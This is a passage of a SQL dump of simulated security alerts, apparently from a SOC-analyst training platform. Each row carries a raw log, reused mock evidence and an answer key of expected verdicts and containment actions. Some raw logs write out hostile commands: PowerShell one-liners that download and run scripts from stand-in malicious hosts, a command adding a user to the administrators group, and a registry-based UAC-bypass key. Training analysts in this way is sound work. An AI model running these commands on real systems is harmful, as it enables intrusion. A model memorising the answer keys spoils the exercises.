(233, 'Phishing Attempt with Malicious URL', 'critical', 'Proofpoint', 'A phishing email was detected with a spoofed sender domain and a malicious URL intended to steal credentials.', 'Phishing', 'T1566', 1, 'investigating', 225, '{\"timestamp\":\"2023-10-01T09:15:30Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.22\",\"email_sender\":\"noreply@secure-bank.com\",\"url\":\"http://secure-bank.com/login\",\"username\":\"target_user\"}', '2025-12-26 09:43:56', '2026-03-13 03:00:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 500 times for hosting phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://secure-bank.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing attempts\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"noreply@secure-bank.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Domain recently registered with no reputation\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The phishing email contains a malicious URL that leads to a credential-stealing page.\"}', 'Advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Attempt with Malicious URL\",\"date\":\"2026-02-01T20:32:18.829Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(234, 'Suspicious Lateral Movement Detected via PSExec', 'medium', 'Wazuh', 'An internal host used PSExec to connect to multiple internal machines, indicating potential lateral movement.', 'Lateral Movement', 'T1570', 1, 'investigating', 225, '{\"timestamp\":\"2023-10-01T11:05:50Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.20\",\"dst_ip\":\"10.0.0.25\",\"username\":\"admin_user\",\"hostname\":\"server-02\"}', '2025-12-26 15:36:00', '2026-03-13 03:08:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Source IP is within internal network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Destination IP is within internal network\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Admin account used for PSExec\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec by an admin account for lateral movement is suspicious and requires further investigation.\"}', 'Beginner', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.829Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T11:05:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"server-02\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.829Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T11:05:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"server-02\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.829Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T11:05:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"server-02\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.829Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T11:05:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"server-02\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.829Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T11:05:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"server-02\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(235, 'False Positive: High Volume Network Traffic Alert', 'low', 'Firewall', 'An unusual spike in network traffic was detected originating from a trusted internal server, initially suspected as data exfiltration.', 'Data Exfil', 'T1020', 0, 'investigating', 225, '{\"timestamp\":\"2023-10-01T13:45:12Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.100\",\"username\":\"service_account\",\"hostname\":\"data-server\"}', '2025-12-26 19:45:34', '2026-03-13 03:31:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in routine backup operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"External IP involved in regular data backup\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"service_account\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Service account used for scheduled data transfer\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The alert was triggered by a scheduled backup process, not malicious activity.\"}', 'Beginner', 'NDR', 1, 0, 'FINANCE', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(236, 'Unauthorized Access Attempt via Credential Brute Force Detected', 'high', 'Firewall', 'A high number of failed login attempts were detected from a single IP address. This is indicative of a brute force attack attempting to gain unauthorized access to the organization’s internal systems. See MITRE ATT&CK Technique T1110 for Brute Force examples.', 'Brute Force', 'T1110', 1, 'investigating', 225, '{\"timestamp\":\"2023-10-15T02:38:47Z\",\"source_ip\":\"192.0.2.45\",\"destination_ip\":\"203.0.113.5\",\"destination_port\":\"22\",\"event\":\"Failed login attempt\",\"username\":\"admin\",\"attempt_count\":150,\"device\":\"Firewall\",\"location\":\"New York, USA\",\"rule_triggered\":\"Brute Force Detection Policy\",\"log_id\":\"fw123456789\",\"session_id\":\"5d2b7c4f-e5c4-42b0-b5e1-d4f7e642b895\"}', '2025-12-26 05:00:04', '2026-03-15 10:41:09', NULL, 'Intermediate', 'SIEM', 1, 0, 'TECH', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(237, 'Suspicious PowerShell Script Execution', 'high', 'process', 'A PowerShell script was executed with commands commonly associated with file-less malware activity.', 'Malicious Script Execution', 'T1086', 1, 'investigating', 303, '{\"timestamp\":\"2023-11-01T14:23:05.123Z\",\"hostname\":\"DESKTOP-7GTB8K3\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"pid\":4521,\"cmdline\":\"powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.example.com/script.ps1\')\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"parent_process\":\"explorer.exe\",\"parent_pid\":3428,\"network_activity\":{\"url_accessed\":\"http://malicious.example.com/script.ps1\",\"resolved_ip\":\"192.0.2.123\"}}', '2025-12-26 05:41:40', '2026-03-15 17:21:45', '{\"correct_verdict\":\"True Positive\",\"triage_answer\":\"Suspicious\",\"containment_answer\":\"Isolate Host\",\"scenario\":{\"ip\":\"109.12.97.181\",\"files\":[{\"name\":\"unknown_tool.ps1\",\"type\":\"script\",\"status\":\"SUSPICIOUS\"}],\"email_subject\":null}}', 'Intermediate', 'EDR', 1, 0, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(238, 'Suspicious Admin Privilege Escalation Detected', 'high', 'process', 'A process was initiated to grant administrative privileges using a seldom used elevated command, indicating potential privilege escalation.', 'Privilege_Escalation', 'T1055 - Process Injection', 1, 'closed', NULL, '{\"timestamp\":\"2023-10-23T14:35:29Z\",\"hostname\":\"finance-server-01\",\"username\":\"jdoe\",\"process_name\":\"cmd.exe\",\"cmdline\":\"cmd.exe /c net localgroup administrators jdoe /add\",\"file_hash\":\"8c7b59a2e13572bf7c147de025d3d02123f7988c\",\"pid\":2356,\"parent_process_name\":\"explorer.exe\",\"parent_pid\":1024,\"user_domain\":\"CORP\",\"event_id\":4678,\"source_ip\":\"192.168.5.10\"}', '2025-12-26 05:57:25', '2026-02-15 05:07:16', '{\"correct_verdict\":\"True Positive\",\"triage_answer\":\"Suspicious\",\"containment_answer\":\"Isolate Host\",\"scenario\":{\"ip\":\"32.46.140.23\",\"files\":[{\"name\":\"unknown_tool.ps1\",\"type\":\"script\",\"status\":\"SUSPICIOUS\"}],\"email_subject\":null}}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(239, 'Suspicious Remote Code Execution Detected', 'high', 'Endpoint Protection', 'A potential remote code execution was detected on an endpoint, involving a suspicious PowerShell command executed via obfuscation tactics.', 'process', 'T1059.001', 1, 'investigating', 137, '{\"timestamp\":\"2023-10-25T14:23:07Z\",\"endpoint_id\":\"WIN-7G8H9JKL01\",\"event_id\":4103,\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell.exe -nop -w hidden -enc WwBTAFUAUgByAFIAXABfAGsAYgB5AHAANQBoAGYAMQBzAC0AaQBzAGMAbwBtAG0AYQBuAGQAXQB7AGU...\",\"integrity_level\":\"High\",\"parent_process\":{\"name\":\"explorer.exe\",\"pid\":4568},\"file_hash\":{\"md5\":\"3b3f6bf0277b2973ff07371d5c6efbff\",\"sha1\":\"42ebf3a68eee911d85c9d6041d3b8e4c4ecf6dd2\"},\"user\":\"DOMAIN\\\\jdoe\",\"network_activity\":{\"outbound\":true,\"destination_ip\":\"10.0.0.75\",\"destination_port\":80}}', '2025-12-26 05:44:53', '2026-02-12 23:43:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"25.133.105.171\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 25.133.105.171 reported 454 times for malicious activity. Abuse confidence score: 85%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"system\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(240, 'Suspicious PowerShell Command Execution', 'medium', 'endpoint', 'A potentially malicious PowerShell script was executed on the endpoint. The script uses encoded command obfuscation techniques.', 'process', 'T1059.001', 0, 'Closed', 41, '{\"timestamp\":\"2023-10-10T14:32:58Z\",\"hostname\":\"Workstation-23\",\"username\":\"jane.doe\",\"process_name\":\"powershell.exe\",\"pid\":4567,\"parent_process\":\"explorer.exe\",\"ppid\":789,\"cmdline\":\"powershell.exe -NoProfile -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0AYQBnAGs\",\"file_hash\":\"3f50f0a35cc9b36fc3f0e1f2b0cf3a78\",\"user_domain\":\"CORP\",\"integrity_level\":\"High\",\"command_length\":43}', '2025-12-27 05:37:34', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"242.96.134.59\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP 242.96.134.59 has 0% abuse confidence score. Located in corporate network range.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"User accessed from known location during normal business hours. Activity consistent with role.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"suspicious_activity\"}', 'Beginner', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(241, 'Suspicious Command Execution Detected', 'medium', 'process', 'A suspicious command execution was detected involving base64 encoding of an unknown script.', 'Potential Obfuscation or Encoding', 'T1027 - Obfuscated Files or Information', 0, 'Closed', 41, '{\"timestamp\":\"2023-10-12T14:23:34Z\",\"hostname\":\"workstation-7F5D\",\"username\":\"j.doe\",\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell -NoProfile -Command Invoke-Expression (New-Object Net.WebClient).DownloadString(\'http://malicious.example/script\')\",\"file_hash\":\"sha256:d8a1c4cbf1e1367c2c6fd589v71c4c6f2b3d8e56ab60dcd526bfed9f2b68be23\",\"parent_process_name\":\"explorer.exe\",\"parent_pid\":1020,\"pid\":3284,\"event_id\":4688,\"event_message\":\"A new process has been created\"}', '2025-12-27 05:01:40', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"100.56.249.171\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 100.56.249.171 reported 173 times for malicious activity. Abuse confidence score: 93%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Beginner', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(242, 'Suspicious PowerShell Script Execution Detected', 'high', 'endpoint', 'A potentially malicious PowerShell script with obfuscated code has been executed on an endpoint.', 'Process Execution', 'T1059.001', 1, 'investigating', 225, '{\"timestamp\":\"2023-11-01T14:32:16Z\",\"hostname\":\"DESKTOP-7GTHB9K\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"process_id\":2678,\"cmdline\":\"powershell.exe -NoP -NonI -W Hidden -E JABzAHQAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGU... (truncated)\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"file_hash\":\"2B2B6D120897FBB5783C3F8DCF57DBBA\",\"parent_process\":\"explorer.exe\",\"parent_process_id\":1744,\"network_activity\":{\"dest_ip\":\"192.168.1.10\",\"dest_port\":80},\"registry_modifications\":{\"key\":\"HKCU\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command\",\"value\":\"calc.exe\"}}', '2025-12-27 05:08:14', '2026-03-15 10:54:30', '{\"correct_verdict\":\"True Positive\",\"triage_answer\":\"Suspicious\",\"containment_answer\":\"Isolate Host\",\"scenario\":{\"ip\":\"162.113.139.213\",\"files\":[{\"name\":\"unknown_tool.ps1\",\"type\":\"script\",\"status\":\"SUSPICIOUS\"}],\"email_subject\":null}}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(243, 'Critical RDP Brute Force Attack Detected', 'critical', 'Firewall', 'Multiple failed RDP login attempts were detected from a single external IP address, indicating a brute force attack. This pattern of behavior is consistent with tactics outlined in cybersecurity incidents, such as the worldwide brute force attacks on RDP services in 2021.', 'Brute Force', 'T1110', 1, 'investigating', 225, '{\"timestamp\":\"2023-10-24T18:35:24Z\",\"src_ip\":\"192.168.1.25\",\"dest_ip\":\"10.0.0.4\",\"attempt_count\":45,\"usernames_attempted\":[\"admin\",\"guest\",\"user1\"],\"protocol\":\"RDP\",\"event\":\"Failed login attempt\",\"firewall_id\":\"fw-12345678\",\"region\":\"us-west-2\",\"request_id\":\"req-abc123\",\"message\":\"Login failed due to incorrect credentials\",\"related_events\":[{\"timestamp\":\"2023-10-24T18:32:03Z\",\"src_ip\":\"192.168.1.25\",\"event\":\"Login attempt\"},{\"timestamp\":\"2023-10-24T18:34:16Z\",\"src_ip\":\"192.168.1.25\",\"event\":\"Connection established\"}],\"geo_location\":{\"country\":\"Unknown\",\"region\":\"Unknown\"}}', '2025-12-27 05:00:06', '2026-03-16 02:59:05', NULL, 'Advanced', 'SIEM', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(244, 'Malware Detected on Endpoint via Suspicious Process Execution', 'high', 'CrowdStrike', 'A suspicious process execution was detected on an internal machine, indicating potential malware activity. The process was associated with a known malicious hash.', 'Malware', 'T1059', 1, 'Closed', 232, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":null,\"username\":\"jdoe\",\"hostname\":\"workstation-1\",\"file_hash\":\"3f5d2c7e1d4b8f9a6a7f8b2d3a4c5d6e\",\"process_name\":\"malicious.exe\"}', '2025-12-27 15:13:22', '2026-03-15 17:03:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3f5d2c7e1d4b8f9a6a7f8b2d3a4c5d6e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in multiple malware reports\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Valid internal user account\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a known malicious file hash on an internal machine, executed by a suspicious process, confirms this as a true malware incident.\"}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(245, 'Malware Detected - Suspicious Process Execution', 'high', 'CrowdStrike', 'A suspicious executable was detected running on the host, potentially indicating malware activity. The process attempted to connect to a known malicious C2 server.', 'Malware', 'T1059', 1, 'investigating', 232, '{\"timestamp\":\"2023-10-05T14:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.5\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2025-12-29 00:07:31', '2026-03-15 17:12:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 